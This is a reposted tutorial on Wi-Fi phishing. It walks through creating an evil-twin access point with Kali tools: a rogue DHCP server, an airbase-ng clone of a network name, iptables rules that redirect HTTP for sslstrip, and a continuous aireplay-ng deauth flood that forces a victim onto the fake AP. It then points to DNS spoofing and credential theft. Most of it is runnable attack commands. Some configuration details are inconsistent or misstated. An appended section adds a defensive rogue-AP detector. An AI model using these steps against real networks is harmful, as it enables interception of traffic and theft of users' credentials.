Technology sharing-getting started with WIFI phishing

Source: Internet
Author: User

Introduction

This experiment first sets up a test environment, then creates a rogue wireless access point, connects the rogue access point to the network, and forces the user's device to connect to it.

Prerequisites

1. Wireless network adapter: used for packet sniffing and injection.

2. Backtrack or Kali Linux: the attack platform.

3. Wireless network: make sure the wireless network is one the user actually uses and that you control its wireless access point.

4. A target machine: This machine can be your physical machine or virtual machine. This experiment uses a Windows 7 virtual machine.

Start experiment: Create a rogue access point

Step 1:

Start the virtual machine software and select Kali Linux. Click "Edit virtual machine settings", go to the "Network Adapter" option and select "Bridged" under "Network connection":

 


 

Step 2:

Log in with the Kali root account.

Step 3:

Connect the laptop's wireless network card. Make sure there is a blue check mark in front of the wireless NIC entry under the Removable Devices option. If there is not, select the wireless network card so that it is disconnected from the Windows system and connected to the Kali Linux virtual machine.

 

 


 

Step 4:

Open the terminal and enter the following command to check the IP address and gateway.

 


 

In this example, the gateway is 192.168.0.1

Step 5:

First, use the following command to list all NICs:

You can see a network card named wlan5.

 

 

Step 6:

List the wireless APs available near the user. Run the following command:

airodump-ng wlan5

After this command is run, data packets are captured and the access points near the user are listed. The BSSID is the MAC address of the wireless AP, and the Channel represents the frequency. Note the PWR column: the smaller the absolute value, the closer the AP is.

 

 


 

Step 7:

Write down the BSSID and Channel values of the AP. Also note the MAC address of the target device.

In this example, the BSSID value is 5E:F9:6A:29:28:18, and the Channel value is 2. The MAC address of the target machine is 68:5D:43:7D:F7:E9.

Step 8:

We must create a rogue DHCP server to serve the clients of the rogue access point. Run the following command in Kali to install a DHCP server:

apt-get install isc-dhcp-server

After installation, open the DHCP configuration file:

leafpad /etc/dhcpd.conf

Change its contents to the following:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
  option routers 192.168.1.1;
  option subnet-mask 255.255.255.0;
  option domain-name "Epson_Printer";
  option domain-name-servers 192.168.1.1;
  range 192.168.1.2 192.168.1.40;
}

Save and close the configuration file.

Repeat the preceding operations on the /etc/dhcpd.conf file.

Step 9:

Open the terminal and execute the following command to create an access point whose ESSID is similar to that of the AP the victim uses. In this example, we use "Epson_Printer".

airbase-ng -e Epson_Printer -c 2 wlan5

-e is the ESSID (network name) of the access point

-c is the channel (frequency) of the wireless network

wlan5 is the NIC name

Now, a new AP Access Point named "Epson_Printer" is created.


 

Step 10:

Now open a new terminal and start monitoring the phishing AP with the following command:

airodump-ng --bssid 00:C0:CA:70:8F:25 -c 2 wlan5


 

Step 11:

Check the window generated in step 5. The newly created AP access point should be visible:

 


 

Step 12:

Now we must connect the rogue wireless AP to the network. Open the terminal and enter the following commands in sequence (192.168.0.1 is the gateway):

ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

 


 

 

Step 13:

We can wait for others to connect to this fake Wireless AP, or use the de-authenticate attack to force our target to reconnect to the AP, so that we can capture packets.

Run the following command:

aireplay-ng --deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

-a 5E:F9:6A:29:28:18 is the MAC address of the wireless AP.

0 indicates de-authentication.

-c is the MAC address of the target machine.

wlan5 is the network card.

The wireless network adapter now sends de-authentication packets to the target wireless AP. The target machine is disconnected from the "Epson_Printer" connection point and tries to reconnect.

 

 

Step 14:

Because deauth packets are sent continuously, the client cannot connect to the original wireless AP, so it tries to connect to the next strongest wireless AP. Our rogue AP's signal is very strong, so the client connects to it.

 


 

Step 15:

View the airodump-ng command window. You can view the connected devices in the terminal:

 


 

Now the victim's device is connected to our fake wireless AP. From here on, an attacker has various options, such as using DNS to trick users into connecting to a fake website, obtaining user authentication information, or using sslstrip and ettercap for man-in-the-middle attacks.
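Seen from the defending side, the twin built in Steps 9 and 10 shows up in a scan as the protected ESSID advertised by a BSSID that is not in the site's inventory. The check below is an added example, not part of the original article: it parses scan output in the airodump-ng CSV layout and flags such rows. The inventory `KNOWN_APS`, the WPA2 expectation and every sample value other than the two BSSIDs quoted in the article are constructed assumptions.

```python
import csv
import io

# Constructed sample in the airodump-ng CSV layout (AP section only).
# The two Epson_Printer BSSIDs are the ones quoted in the article; the third
# row and all timestamps, privacy, power and beacon values are made up.
SAMPLE_SCAN = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
5E:F9:6A:29:28:18, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  2, 54, WPA2, CCMP, PSK, -52, 120, 0, 0.  0.  0.  0, 13, Epson_Printer,
00:C0:CA:70:8F:25, 2024-01-01 10:03:10, 2024-01-01 10:05:00,  2, 54, OPN, , , -20, 95, 0, 0.  0.  0.  0, 13, Epson_Printer,
AA:BB:CC:00:11:22, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6, 54, WPA2, CCMP, PSK, -70, 80, 0, 0.  0.  0.  0, 9, GuestWiFi,
"""

# Hypothetical inventory: ESSID -> (authorised BSSIDs, expected Privacy value).
KNOWN_APS = {"Epson_Printer": ({"5E:F9:6A:29:28:18"}, "WPA2")}


def find_rogue_aps(scan_text, known_aps):
    """Return findings for APs that reuse a protected ESSID without authorisation."""
    findings = []
    for row in csv.DictReader(io.StringIO(scan_text), skipinitialspace=True):
        # Rows from other CSV sections lack an ESSID column and are skipped here.
        essid = (row.get("ESSID") or "").strip()
        if essid not in known_aps:
            continue
        bssid = (row.get("BSSID") or "").strip().upper()
        allowed, expected_privacy = known_aps[essid]
        privacy = (row.get("Privacy") or "").strip()
        reasons = []
        if bssid not in allowed:
            reasons.append("unknown BSSID")
        if expected_privacy not in privacy.split():
            reasons.append(f"privacy {privacy or 'none'} != {expected_privacy}")
        if reasons:
            findings.append({"essid": essid, "bssid": bssid,
                             "channel": int(row["channel"]),
                             "power": int(row["Power"]),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_rogue_aps(SAMPLE_SCAN, KNOWN_APS):
        print(f"{f['essid']} from {f['bssid']} (ch {f['channel']}, "
              f"{f['power']} dBm): {', '.join(f['reasons'])}")
```

A twin that also clones the legitimate BSSID passes this check, so it is best paired with alerting on bursts of de-authentication frames like those sent in Step 13.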
